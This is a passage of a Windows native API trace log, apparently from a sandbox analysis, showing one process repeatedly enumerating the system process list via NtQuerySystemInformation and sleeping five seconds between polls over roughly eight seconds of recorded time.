BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.865] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.983] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0228.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0228.106] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0228.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0228.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0228.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0228.253] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0228.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0228.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0228.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0228.365] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0228.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0228.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0228.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0228.535] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0228.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0228.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0228.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0228.675] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0228.689] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0228.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0228.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0228.809] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0228.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0228.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0228.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0228.915] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0228.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0228.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.009] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.100] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.237] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.356] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.478] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.614] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.715] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.848] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0229.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0229.945] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0229.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0229.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0230.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0230.070] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0230.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0230.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0230.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0230.180] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0230.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0230.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0230.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0230.298] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0230.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0230.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0230.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0230.510] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0230.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0230.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0230.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0230.684] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0230.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0230.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0230.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0230.925] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0230.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0230.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0231.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0231.158] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0231.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0231.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0231.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0231.426] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0231.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0231.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0231.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0231.656] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0231.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0231.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0231.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0231.872] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0231.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0231.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0232.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0232.117] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0232.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0232.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0232.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0232.505] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0232.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0232.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0232.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0232.812] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0232.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0232.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0233.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0233.043] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0233.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0233.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0233.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0233.626] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0233.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0233.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0233.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0233.783] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0233.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0233.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0234.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0234.030] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0234.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0234.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0234.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0234.405] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0234.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0234.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0234.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0234.767] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0234.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0234.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0235.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0235.024] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0235.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0235.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0235.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0235.364] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0235.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0235.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0235.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0235.731] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0235.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 